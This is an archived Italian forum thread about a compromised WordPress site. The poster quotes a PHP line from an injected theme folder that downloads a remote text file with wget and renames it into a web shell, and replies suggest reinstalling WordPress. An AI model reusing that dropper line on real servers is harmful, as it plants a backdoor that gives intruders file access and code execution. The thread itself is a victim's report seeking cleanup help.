PDA

Visualizza la versione completa : Codice malevolo - Exploit trovato su sito in Wordpress?


Vincent_E
06-03-2012, 11:54
Ho scoperto che sono riusciti a "bucare" un sito costruito in Wordpress. Nello specifico ho visto l'inserimento di una nuova cartella "theme" contenente quattro file, che richiamavano un codice esterno.

Ho esperienza in codice php e in qualche comando base di Linux, per cui ho tratto qualche conclusione (di cui non sono propriamente certo). Vi faccio un riassunto.

Allora, l'index nella nuova cartella ha soltanto questa riga (sostituisco l'indirizzo del sito con uno fittizio, per sicurezza: se mi date via libera segnalo l'indirizzo completo così potete leggere il txt):

<? exec("wget sito.com/2.txt;mv 2.txt wp-index.php"); ?>

Se ho capito bene, prende il file "2.txt" del server esterno, lo copia nel server del sito in Wordpress e lo rinomina. Il fatto è che non esisteva un file "wp-index.php", ma soltanto un file "wp-word.php".
Ho aperto il "wp-word.php" e in effetti era identico al "2.txt" online nel contenuto. L'antivirus sul mio pc lo rileva, infatti, come virus o malware e me lo blocca.

Ho visto nel codice diversi riferimenti a siti esterni. In particolare vi dice qualcosa il nome "Rafaeltongol"? Se cerco sul web ho trovato alcuni riferimenti poco piacevoli...
Inoltre fa un riferimento al sito milw0rm.com, che da quanto mi risulta è chiuso.

Da quanto ho visto, una volta elaborato, con questo script crea un'intefaccia grafica che permette l'accesso a qualsiasi cosa: vede i file, può creare cartelle e file e addirittura eseguire codice.

Posso toglierlo dal sito, ma la mia paura è che sia "infiltrato" anche in altri siti del server a cui si appoggia quello in Wordpress. Sapete cosa si deve fare per toglierlo del tutto? Chiedo ai gestori del server di fare uno scan completo in cerca dei file malevoli?

MItaly
06-03-2012, 12:10
Dubito che si sia infiltrato altrove, ogni utente ha a disposizione uno spazio ben separato da quelli degli altri. Piuttosto, reinstalla WordPress da capo (in modo da essere sicuro che non ci siano residui in giro) e in futuro verifica di avere installato sempre l'ultima versione di WordPress disponibile e non installare temi e plugin da siti non fidati. Il "virus" in sé non mi pare nulla di che, sono fatti tutti così gli script di questo genere.

Vincent_E
06-03-2012, 12:33
Ho già provveduto a ributtare online la vecchia versione, adesso seguo il tuo consiglio e aggiorno WP (magari cerco dei sostituti ufficiali ai plugin che ho installato).
Grazie per la risposta

LeleFT
06-03-2012, 12:45
Per le prossime: PHP ha una sezione dedicata e c'è pure una sezione per la sicurezza informatica... qui si parla di programmazione con linguaggi general-purpose, quindi nulla che abbia a che fare con PHP, Workpress e virus.


Ciao. :ciauz:

Loading